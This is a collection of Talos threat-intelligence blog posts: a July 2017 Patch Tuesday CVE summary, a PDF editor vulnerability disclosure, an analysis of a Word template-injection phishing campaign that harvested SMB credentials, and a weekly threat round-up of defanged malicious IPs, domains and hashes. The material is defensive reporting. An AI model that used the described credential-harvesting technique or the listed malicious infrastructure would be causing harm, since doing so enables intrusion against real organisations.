Talos Blog

Microsoft Patch Tuesday - July 2017

noreply@blogger.com (William Largent) — Tue, 11 Jul 2017 12:59:00 PDT

Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 54 vulnerabilities with 19 of them rated critical, 32 rated important, and 3 rated moderate. Impacted products include Edge, .NET Framework, Internet Explorer, Office, and Windows.

Vulnerabilities Rated Critical

CVE-2017-8463

This is a remote code execution vulnerability related to the way that Windows Explorer handles executable files and shares during rename operations. If exploited this vulnerability could run arbitrary code, users not running as administrators would be less affected. This vulnerability can be triggered via a malicious share folder and malware named with an executable extension.

CVE-2017-8584

A remote code execution vulnerability exists when HoloLens improperly handles objects in memory. An attacker who successfully exploited this vulnerability could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would need to send a specially crafted WiFi packet.

CVE-2017-8589

This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.

CVE-2017-8594

A remote code execution vulnerability exists when Internet Explorer, this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage.

CVE-2017-8595 / CVE-2017-8596 / CVE-2017-8617

A remote code execution vulnerability exists in Microsoft Edge, this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage. In addition, an attacker could embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine.

CVE-2017-8598

This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document.

CVE-2017-8601

This is a remote code execution vulnerability in the Chakra JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website or an ActiveX control marked "safe for initialization" resulting in the attacker gaining taking full control of the affected system.

CVE-2017-8603

This is a remote code execution vulnerability in Microsoft Edge related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.

CVE-2017-8604

CVE-2017-8605

CVE-2017-8606 / CVE-2017-8607 / CVE-2017-8608 / CVE-2017-8609

This is a remote code execution in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.

CVE-2017-8610

CVE-2017-8618

This is a remote code execution in the VBScript engine, when rendered in Internet Explorer handles objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.

CVE-2017-8619

These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. This resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website.

Vulnerabilities Rated Moderate

CVE-2017-0170

An information disclosure vulnerability exists in the Windows Performance Monitor Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity(XXE). To exploit the vulnerability, an attacker could create specially crafted XML data and convince an authenticated user to create a Data Collector Set and import the file. To create a Data Collector Set, the user must be a member of the Performance Log Users or Local Administrators group.

CVE-2017-8611

This is a spoofing vulnerability in Microsoft Edge when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities.

CVE-2017-8621

An open redirect vulnerability exists in Microsoft Exchange that could lead to spoofing. To exploit the vulnerability, an attacker could send a crafted URL, when an authenticated Exchange user clicks the link, the authenticated user's browser session could be redirected to a malicious site that is designed to impersonate a legitimate website. By doing so, the attacker could trick the user and potentially acquire sensitive information, such as the user's credentials.

Vulnerabilities Rated Important

CVE-2017-0243

A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with privileges of the current user. This can be exploited by having a user open a specially crafted file.

CVE-2017-8467

An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege.

CVE-2017-8486

This is an information disclosure vulnerability in Microsoft Windows when Win32k fails to properly handle objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application.

CVE-2017-8495

A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. Successful exploitation of this vulnerability could be used to bypass Extended Protection for Authentication.

CVE-2017-8501 / CVE-2017-8502

These are remote code execution in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.

CVE-2017-8556

CVE-2017-8557

An information disclosure vulnerability exists in the Windows System Information Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity(XXE). To exploit the vulnerability, an attacker could create specially crafted XML data.

CVE-2017-8559 / CVE-2017-8560

An elevation of privilege vulnerability exists when Microsoft Exchange Outlook Web Access (OWA) fails to properly handle web requests. Exploitation occurs by an authenticated attacker sending a specially crafted request.

CVE-2017-8561

This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege.

CVE-2017-8562

There is a privilege escalation vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call (ALPC). This is exploitable by local attacker executing a specially crafted application to elevate privilege.

CVE-2017-8563

An elevation of privilege vulnerability exists in Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol. This is exploitable by local attacker executing a specially crafted application to send malicious traffic to a domain controller.

CVE-2017-8564

This is an information disclosure vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a crafted application, allowing the attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass.

CVE-2017-8565

This is a remote code execution vulnerability within PowerShell when PSObject wraps a CIM Instance. An attacker who successfully exploited this vulnerability could execute malicious code on a vulnerable system.

CVE-2017-8566

This is an elevation of privilege vulnerability in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled and an attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. This is exploitable by local attacker executing a specially crafted application to elevate privilege.

CVE-2017-8569

An elevation of privilege vulnerability exists in Microsoft SharePoint Server, when it does not properly sanitize a specially crafted web request. An authenticated attacker could exploit the vulnerability, via a specially crafted request, to an affected SharePoint server. If successfully the attacker could then perform cross-site scripting attacks on affected systems and run scripts in the privilege of the current user. This can allow the attacker to read content they are not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user.

CVE-2017-8570

CVE-2017-8573 / CVE-2017-8574 / CVE-2017-8577 / CVE-2017-8578 / CVE-2017-8580

An elevation of privilege vulnerability exists in Microsoft Graphics Component. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

CVE-2017-8581

An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An authenticated attacker who successfully exploited this vulnerability could run processes in an elevated context.

CVE-2017-8582

An Information Disclosure vulnerability exists when the HTTP.sys server application component improperly handles objects in memory. A remote unauthenticated attacker could exploit this vulnerability by issuing a request to the server application.

CVE-2017-8585

This is a denial of service vulnerability when Microsoft Common Object Runtime Library improperly handles web requests. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET application. This attack could cause a denial of service on the target system, requiring a reboot to resolve.

CVE-2017-8587

A Denial Of Service vulnerability exists when Windows Explorer attempts to open a non-existent file. An attacker could exploit this vulnerability by hosting a specially crafted web site and convince a user to browse to the page, containing the reference to the non-existing file, and cause the victim's system to stop responding.

CVE-2017-8588

A remote code execution vulnerability exists in the way that Microsoft WordPad parses specially crafted files. Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft WordPad. An attacker could exploit the vulnerability by sending a specially crafted file to the user via email.

CVE-2017-8590

An elevation of privilege vulnerability exists in Windows Common Log File System (CLFS). A locally authenticated attacker could exploit this vulnerability by running a specially crafted application to take control of the affected system. An attacker who successfully exploited this vulnerability could run processes in an elevated context.

CVE-2017-8592

A security feature bypass vulnerability exists when Microsoft Browsers improperly handle redirect requests. This vulnerability allows Microsoft Browsers to bypass CORS redirect restrictions and follow redirect requests that should otherwise be ignored. An attacker who successfully exploited this vulnerability could force the browser to send data that would otherwise be restricted to a destination web site of their choice.

CVE-2017-8599

A security feature bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. This can be exploited by a user visiting a specially crafted webpage.

CVE-2017-8602

This is a spoofing vulnerability in Microsoft Browser when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities.

Coverage

In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.

Snort Rules:
42753
42755-42756
43460-43463
43465-43466
43469-43474
43490-43493
43521-43522

Vulnerability Spotlight: Iceni Infix PDF Editor Memory Corruption

noreply@blogger.com (Nick Biasini) — Tue, 11 Jul 2017 07:29:00 PDT

Today, Talos is disclosing a vulnerability that has been identified in Iceni Infix PDF Editor that could lead to arbitrary code execution on affected hosts. This vulnerability manifests in a way that could be exploited if a user opens a specifically crafted PDF file that triggers this flaw. Talos has coordinated with Iceni to ensure relevant details regarding the vulnerability have been shared. Iceni has developed a software update that addresses this vulnerability. In addition, Talos has developed Snort Rules that can detect attempts to exploit this flaw.

Vulnerability Details

TALOS-2017-0367 was identified by Piotr Bania of Talos.

TALOS-2017-0367 (CVE-2017-2863) is memory corruption vulnerability in Iceni Infix that could be leveraged to achieve arbitrary code execution on the affected device. TALOS-2017-0367 manifests as a out of bound write flaw in the PDF parsing functionality. Exploitation is possible if a user were to open a specifically crafted PDF file that targets this vulnerability. The most likely form of attack this could be exploited would be in a social engineering scenario where a user receives an email containing a malicious PDF that exploits this vulnerability.

For more technical details, please read our advisory here.

Coverage

Talos has developed the following Snort rules to detect attempts to exploit this vulnerability. Note that these rules are subject to change pending additional vulnerability information. For the most current information, please visit your Firepower Management Center or Snort.org.

Snort Rules: 43212-43213

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: http://www.talosintelligence.com/vulnerability-reports/

To review our Vulnerability Disclosure Policy, please visit this site:
http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html

Attack on Critical Infrastructure Leverages Template Injection

noreply@blogger.com (Earl Carter) — Fri, 07 Jul 2017 13:34:00 PDT

Contributors: Sean Baird, Earl Carter, Erick Galinkin, Christopher Marczewski & Joe Marshall

Executive Summary

Attackers are continually trying to find new ways to target users with malware sent via email. Talos has identified an email-based attack targeting the energy sector, including nuclear power, that puts a new spin on the classic word document attachment phish. Typically, malicious Word documents that are sent as attachments to phishing emails will themselves contain a script or macro that executes malicious code. In this case, there is no malicious code in the attachment itself. The attachment instead tries to download a template file over an SMB connection so that the user's credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim's computer.

Background

Since at least May 2017, Talos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers use to deliver critical services. Attacks on critical infrastructure are not a new concern for security researchers, as adversaries are keen to understand critical infrastructure ICS networks for reasons unknown, but surely nefarious.

One objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries. Using a new twist on an old attack method, a clever adversary stole credentials from their victims by sending malicious word documents via email. These documents when opened, attempt to retrieve a template file from an attacker controlled external SMB server.

Technical Investigation

In the midst of recent attack trends and global campaigns, it has become easier to pass over simple techniques that serve attackers' best interests for years. As Talos has recently observed, sometimes new takes on reliable techniques can make them even more effective.

While investigating a recently reported attack and pivoting on the data provided, we landed on several interesting DOCX samples which were delivered as attachments in malicious spam emails. As shown below, these documents often claimed to be environmental reports or resumés/CVs.

Sample email containing a malicious document

One DOCX sample used during this attack

Another DOCX sample used during this attack

Our first expectation was that we would find some malicious VBA macros or embedded scripting within the sample itself. Examination of the VBA code provided no such leads:

Analysis of the document using oletools

We confirmed this by running the sample against another similar tool:

Further analysis of the DOCX

Again, none of the usual indicators of an embedded binary that would contain such code appeared in our analysis. The sample had been acquired from our sandbox by researching an IP address related to the attack, but the server was no longer accepting such requests at the time of the sandbox run. While we investigated other leads, we set up an isolated environment with a server listening on TCP 80 to determine what the document was trying to obtain, if anything.

At the loading screen for Word, we noticed something interesting:

Word attempting to load a template

The document was trying to pull down a template file from a particular IP, but no connection over TCP 80 had yet reached our decoy server. Sure enough, our live capture showed a failed handshake over TCP 445 instead. It was now time to manually parse the contents of the document for the IP address in question. Instead of code, we found an instance of template injection:

Instance of template injection found in the document

Our initial intelligence concerning the attack suggested that a malicious SMB server was being used to silently harvest user credentials. As conveyed in the sample, we can now see that an injected template was used to establish such a connection to an external server over SMB. Still, this did not explain why the same sample had attempted a session over TCP 80. After further research, we determined that the sandbox VM had an established preference over SMB when it came to this connection type. In short, due to the network preference of the host, a WebDAV connection was attempted over an SMB session when requesting the template. This was confirmed with another related sample when another external server was still listening on TCP 80 but no longer serving the template.

Sandbox PCAP of the sample

The only entity left to move on from the template settings was the specific Relationship ID that was present in word/_rels/settings.xml.rels within the sample: rId1337. Researching this Relationship ID led us to the GitHub page of a phishing tool named Phishery which happened to use the exact same ID in its template injection:

GitHub page of the Phishery tool

Suprisingly, the same ID is found at the bottom of the aforementioned Go source:

"rId1337" found in the Phishery tool, line 105.

Phishery, however, does NOT rely on a malicious SMB server. Rather, the connection is handled over HTTPS, and the user credentials are harvested via Basic Authentication with a prompt for the credentials. Such a prompt was not needed nor seen for samples requesting the template over SMB. The fact that both this tool and the reported attack rely on template injection with the exact same Relationship ID suggests one of the following:

1. Mere coincidence (always a possibility);
2. The attackers took notice of this tool and either modified it or developed their attack from scratch while sticking to the same concept used by the tool; or
3. The attackers used the same Relationship ID to thwart analysis of the attack itself (remember: our first inclination was to follow-up on the failed connection attempts over TCP 80).

At this time, there is no evidence to confirm any of the three possibilities. However, the attackers' reliance on a successful SMB session stemming from outbound traffic over TCP 445 further confirms that organizations are still failing to properly block such egress traffic to public hosts. With no credential prompt needed for the SMB variation, we can come to understand the simplicity and effectiveness of such a technique. If an attacker is able to compromise a host and run such a server internally, the situation becomes significantly more grave.

Furthermore, since the attacker controlled SMB server was down when we analyzed these samples, it is not possible to determine the ultimate payloads (if any) that could have been dropped by the template being downloaded. As we have seen with recent attacks, the intent of an attack is not always obvious. Forcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.

Conclusion

Talos responded to these attacks by reaching out to known affected customers and ensuring that they were aware of and capable of responding to the threat. It also illustrates the importance of controlling your network traffic and not allowing outbound protocols such as SMB except where specifically required for your environment. Additionally, a number of ClamAV signatures and email rules were written in order to ensure that threats leveraging this Office template injection technique are blocked in the future.

Coverage

ClamAV signatures created to identify this attack:

Doc.Tool.Phishery-6331699-0
Doc.Downloader.TemplateInjection-6332119-0
Doc.Downloader.TemplateInjection-6332123-0

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) blocks the malicious word documents used by these threat actors.

CWS, WSA, and Umbrella can help identify outbound connections used by these threat actors.

Email Security can block malicious emails sent by threat actors as part of their campaign.

AMP Threat Grid helps identify malicious binaries and builds protection into all Cisco Security products.

IOCs

Due to the nature in which we obtained intelligence related to these attacks, we are unable to share all of the IOCs related to this event; however, we wanted to share as much as possible in the spirit of transparency and collaboration.

Malicious Documents
Filename: Report03-23-2017.docx
SHA256: 93cd6696e150caf6106e6066b58107372dcf43377bf4420c848007c10ff80bc9

Filename: Controls Engineer.docx
SHA256: (1) b02508baf8567e62f3c0fd14833c82fb24e8ba4f0dc84aeb7690d9ea83385baa
(2) 3d6eadf0f0b3fb7f996e6eb3d540945c2d736822df1a37dcd0e25371fa2d75a0
(3) ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08

Related IP Addresses
184[.]154[.]150[.]66
5[.]153[.]58[.]45
62[.]8[.]193[.]206

Threat Round-up for June 30 - July 07

noreply@blogger.com (Edmund Brumaghin) — Fri, 07 Jul 2017 09:30:00 PDT

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 30 and July 07. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Doc.Downloader.Generic-6332126-0
Downloader
This breed of document downloaders was discovered after following a lead on a Zbot downloader. They rely on slight obfuscations to the OOXML format that still allows for successful loading in Microsoft Word, yet prevents successful runs in select sandbox environments. They also depend on highly obfuscated JS code within a CDF binary contained within the sample itself. Most of the samples rely on repeated use of hex string concatenation, further preventing static analysis of the code.
Doc.Dropper.Agent-6332127-0
Office Macro Downloader
This is an obfuscated Office Macro downloader that leverages Powershell to download a malicious executable payload. The host that these samples attempt to download the next stage from currently does not resolve.
Doc.Macro.Obfuscation-6331107-0
Office Macro
Malware authors will attempt to obfuscate the macro code saved inside Office documents to prevent detection or to hide the intent of the code at first glance. This signature detects a recent widely used technique to hide code by using many arithmetic operations.
Win.Phishing.NikoLata-6332081-0
Web scam phishing
The NikoLata application repeatedly opens browser windows to the maliciously controlled redirect http://bigpicturepop[.]com/redirect/57a764d042bf8 on the benign site bigpicturepop[.]com. These redirects have been seen resolving to pornographic sites, multiple tech scammer sites, and others.
Win.Ransomware.Nyetya-6331387-0
Ransomware
Nyetya is wormable destructive malware that spreads via Psexec, WMI, and the SMB exploits EternalBlue and EternalRomance. Read more about it on our blog http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html and http://blog.talosintelligence.com/2017/07/the-medoc-connection.html.
Win.Trojan.Fileinfector-67
Worm
Win.Trojan.Fileinfector-67 is a file infector that will spread itself by injecting its code into any kind of file in the filesystem.
Win.Trojan.Fynloski-6332091-0
Trojan
Fynloski is a trojan which can be used to deliver other malware to infected computers. These samples are self-extracting cab archives, and the dropped binaries are further obfuscated. The actual code is unpacked on the stack with mov instructions.
Win.Trojan.Siggen-6261194-0
Trojan
This is a .Net malware and it has anti-vm tricks. It injects itself in another process and tries to contact CnC servers if the victim computer has network connectivity and it is not an instrumented environment.

Threats

Doc.Downloader.Generic-6332126-0

Indicators of Compromise

Registry Keys

Mutexes

Local\10MU_ACBPIDS_S-1-5-5-0-61147
Local\10MU_ACBPIDS_S-1-5-5-0-58021
\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59580

IP Addresses

119[.]28[.]71[.]78
109[.]86[.]76[.]58
37[.]115[.]165[.]159

Domain Names

hoefnen[.]xyz
berasadot[.]top
bagrati[.]top
page[.]numberx[.]org
au[.]forestllc[.]org

Files and or directories created

%TEMP%\iio322171.uu
%AppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\lsmkk2[1].exe
%AppData%\Microsoft\Office\Recent\account_3166.LNK
%AppData%\Microsoft\Office\Recent\statement_d0bwfa.LNK
%AppData%\Microsoft\Templates\~$Normal.dotm

File Hashes

a825d66cf2dbc9d745ef75837b68adee35aac2620e6933876d7662bf1f815a90
ed62f5e6c396940a455a82a7a1864ac696fb00e576631b3293ec53bb4292700d
5788dbf3fef2fbf8f4dbe3edfe8ddc955c9741f6d7287f5d7427d0df53275108
e2c4800a2a925ef71fe173269fe237bd2a43706e897c2de59f96ad5064a2389e
bf544987ac6ee03cb089d54fac8c885bb4c02ef709576f46890d51335a15bef1
542abc75b0bba97deafa82b3424afb98beee71d71599345e659038a7dc969219

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Doc.Dropper.Agent-6332127-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

77[.]123[.]218[.]185

Domain Names

aninasmeesmase[.]com
iitttyense[.]com
monenanshca[.]com
onasnenekaskeeee[.]com
iianem[.]com
mmmzmzlll[.]com
oppasnndnew[.]com
tranasportnmme[.]com
uuunasn[.]com

Files and or directories created

\TEMP\request.doc
\TEMP\~$equest.doc
\Documents and Settings\Administrator\Recent\request.lnk
%AppData%\alnyliz.exe

File Hashes

17d6dc47409d9a49ff9e0af92088213e1fe7d8cac1f69d73892d229b76395c43
4daaadac1d8dfa337f8e13cff2e3af24cbe6aa97877f3cec1e140507e9f20f19
53e6613c677e5498367a85b43569c81fd4d6d8c211ace257749a7c4f49bdf632
8f6515daea52d6b0e02b113f0357801d55f7d74dc113ab76055ad835ede11002
943ea63228ffb638ad4179ea79531d282ecf01e4d58764eb7bb0c3329a82b1ea
97597a498ab5b13b1fe3cb52e41eee108d91364b31895f896c884c36e28e0d59
a0ccac6ea86fcdbae485abbf7f4374591ae4617cc78b09cb2e13657ad45a9b7e
dad0a717b8fe07b9fc60d7a31deff159814c1c33702256a23e882bac0b50e94a
df159704ed213a2f6ebf4087006acd2502aecc586b6828ae5222688cf9c20745

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Doc.Macro.Obfuscation-6331107-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

185[.]165[.]29[.]36

Domain Names

Files and or directories created

\Users\Administrator\Documents\20170705\PowerShell_transcript.PC.0WdK03OL.20170705095145.txt

File Hashes

7ffb78b5dee7b2d48155236daaea99b9887ff61ec107d48a2522c951795f3353
af89ebcecc2478cb5f90696aa75aaa3dca27c4928265b4b6833e95b5672d7a0a
1a3bd5acc39ff619417fc217786f8b6338348a1f5eda994cbd03a5d014d351b8
8db59629e0b972ca9aa4da3dd56278340dc1f4ad7849e536bd2a1dc2c8ec59ff
1e56463b3aebc9fdf435ca3910a7db4e5a1c9f7b6568da5ced62b2451345eb68
0696df98c9074fc4c05454149e9a9ce7f3bfec9d19852691a49919027aa2be05
01d024ae353d2c4349fb13bfff1417e77ee2f85c75834f91762f80ca1d25a0c9
f38d35b8be18d3efe2394929184ad41e9e7c1f699bbc5cdebc4783b159075c66
c5ceecdc491077b8db797d1c65eed03efed8ea28cd0ee5d0926e3fa591920426
441e093374df7b806bf883d564810c8733b5f664add7baa4a8b7df6c49b04dcf
403589bd4b2c275564aac4382800eaf5836ff61817ddb76afb9b7c7f24b0c0e9
ef4685089d285ce677bc2aa2f2490dd25120d2af19fb6d2570adb03f0a5a3e7a
1d7bd5817b240a053cac0c6b3af1d848ed4b03e6bd334bd2e040800215d8d601
dc4c028949fdd43c7d67fe085e4c85a62633a38e49a510e71d41270008fd29fa
c07cdfd59b7ea1bdd2a6e267df60300bf23b1888f0582ef050946d0cba571f08
6cea69fa05cbf2a0db2ca40684ccbf3e4ea4744f5f6ae27655871d35cc6c85bd
ec988f1b09c617c1b609e25aea76e7afa871bb2188accd75f3dd24d0834c5c47
29013332f09195261f8be7fd43674e4e5132a28744ed52a45d787646a6e8659f
c30d4d4b41d7f690762ef26ffdbf14c7eff7ce92e7b8cfa87f5182bb057f05a2
ee97cf5279ca40e5e3d879f4a8e0fdec6b3a5fb7547ece74252c72419df0a6fd
877107ecf0a698fad3a210289777dc647650c493f11cb384044a879efb3f16fb
123abdbf3c470dde32d7cbfa97e0393eaf602a3befa8050dfe8738a1c4b14768
124e908d1670ede9541b4f0ed6376dd03c62d1cf7b0ff22943a7fa3be90ce238
ff7706bdd749accba1ea5c49903fb200af7fb3edf3e95d5f9686e78ec699847e
470918fd1ed47e4454af807c3b14b55314cb07a86d053ff83f3233628f08bd8e

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Phishing.NikoLata-6332081-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

176[.]31[.]115[.]114

Domain Names

bigpicturepop[.]com

Files and or directories created

File Hashes

0033e8aa040b150f10aae632940f5e975fdd8c9f3c50e3390655c4098a41a4a0
0899df6fe90b23914cf7bfaabf5b52eb61565f529006e1f8ae5c1c3603eb9120
0a222dac8daabd8f2ba8825519ad65916f88ad194caf3a0bde754cf49bc41699
102113176eeb0d8b170adda4fe1fc531d54bc8b8faa8aa0cbc8968acc478d2ee
237fdfef4a1dc47ebf3119ba0f16ea6f780acab50d964816f1d00c7340246366
338dcfc2a8933338210abb98144ec4d50907130b24c59b00307d1e37e89eeaab
34d135535a27eb46f4eefb5c62cf98f86a246cb1b8328206e300667e149d5e20
3727278e0326aa8726e8320d75b2224b601d575e49147befec4089fde72c8b6c
378be621adbd9655c1e8f439134b99da4eecddf41b09f3484496663cc2ea393f
3cb106ce8f4015abe7b2789f2675b5b4dc266b8c976bb79b4a9e50599ab822ba
466f3aaa5c69515cfeb0900d4c0487aa2c1e12fcc8d8bf2ed730ca56a22943ca
49e513841ef91b0b3cb3d58fe1d7e2c75373800c7c5062653905126bd1c586e3
61d79e963c2f1762920d1c8729d0e604cae6050cfc36bddc309fb9ffbecc0182
713353bc597075e577b738f843e9372444f8ed0010efc11ff80303dc9656f96b
7bb0b281ee6cd0d0859c51c4866528c1de8d36a337ef8449bde7422da6e7b908
857699fe734788e94f2fa7bf025211426c44aa065143ab98b55ab2864424fb8d
8fa890ae7063262b8092da0fff281cb11b633dd83e1f228351d187a07e51c248
90d993829351a41644966a191100eb7971c7fc886dfdcb2c023e6c7fb43900f9
9a60e3fc1c6e903f089b56c852b050f04dcbab6adf0bd44215e310b0b2663de6
a41812691e197802b49cf1c6b1fcbf7d4f933a87032f3edd22e9e003749c5f21
a7c803f8e2d17980b71ee3e895953e699da2cf316a70b1f76d5279f0af433235
b1a0201a3d9529d966509111e6704f4bda521e26fc8142345e3f61712a64df55
baf999647eb654bda2447ab3f017e634813fa3b01a656bda998178d17cfd0c1c
bdb1b6aef20ec375f6f85c4f19a0d04228287e59dccbc72aaa79df1b9cbf9fc8
c16b026d16e9ef8574dbb1e0f92b802ffb19ccb41cfe957246ffeba98b82f3df
cb3f34148beb2763a71b1727916490ac9e8825a68f60c296ebd98c4ec7bbfb6c
cb891c0462de4eb8aa98c0af2ca4c70ea3e8ceb5f804af9c4b3a01abcfef82c9
cdb21c6a6a47a508b5bf05f1f4e49b1a550cacec2452657fb9f094b2f0de9890
ce397649edb82756667a63c26de24373992b84bbc4cf80353f5117876acebb2d
eb024d54b61073e674d06c53fdc1523156d75268eaf9aff20070364df4ab0760
ef509c6ac1fae60d57f773e4087b0412d3f08edbb19dc93218b183724bd64d83
f1adbdee86076c202ab5d5783c9e8d5873b76a88a86a81ad10c275884303eaff

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Ransomware.Nyetya-6331387-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

%SystemDrive%\WINDOWS\perfc.dat

File Hashes

027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998
02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f

Coverage

Screenshots of Detection

AMP

ThreatGrid

Screenshot

Win.Trojan.Fileinfector-67

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

%SystemDrive%\c2d124b8466cec6b3e47c4\i386\mxdwdrv.dll
%AppData%\Adobe\Acrobat\11.0\Security\directories.acrodata
%AppData%\Adobe\Acrobat\8.0\AdobeSysFnt08.lst
%CommonProgramFiles%\Microsoft Shared\Filters\VISFILT.DLL
%SystemDrive%\AUTOEXEC.BAT
%System32%\wdi\LogFiles\WdiContextLog.etl.001
%SystemDrive%\CONFIG.SYS
%AppData%\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl
%AppData%\Adobe\Acrobat\11.0\JSCache\GlobData
%SystemDrive%\c2d124b8466cec6b3e47c4\amd64\msxpsinc.gpd
%AppData%\Adobe\Acrobat\11.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl
%SystemDrive%\c2d124b8466cec6b3e47c4\i386\filterpipelineprintproc.dll
%AppData%\Adobe\Acrobat\11.0\JSCache\GlobSettings
%AppData%\Adobe\Acrobat\10.0\Security\addressbook.acrodata
%SystemDrive%\c2d124b8466cec6b3e47c4\i386\xpssvcs.dll
%AppData%\Adobe\Acrobat\7.0\Updater\udstore.js
%AppData%\Adobe\Acrobat\7.0\UserCache.bin
%AppData%\Adobe\Acrobat\10.0\ReaderMessages
%AppData%\Adobe\Acrobat\11.0\TMDocs.sav
%AppData%\Adobe\Acrobat\11.0\assets\assets-140109170701Z-78340
%AppData%\Adobe\Acrobat\7.0\Collab\RSS
%SystemDrive%\c2d124b8466cec6b3e47c4\i386\msxpsdrv.inf
%AppData%\Adobe\Acrobat\11.0\TMGrpPrm.sav
%AppData%\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js
%AppData%\Adobe\Acrobat\8.0\Preferences\AutoFillDefaults.dat
%AppData%\Adobe\Acrobat\8.0\Synchronizer\adobesynchronizersu80
%AppData%\Adobe\Acrobat\8.0\AdobeCMapFnt08.lst
%CommonProgramFiles%\Microsoft Shared\Filters\msgfilt.dll

File Hashes

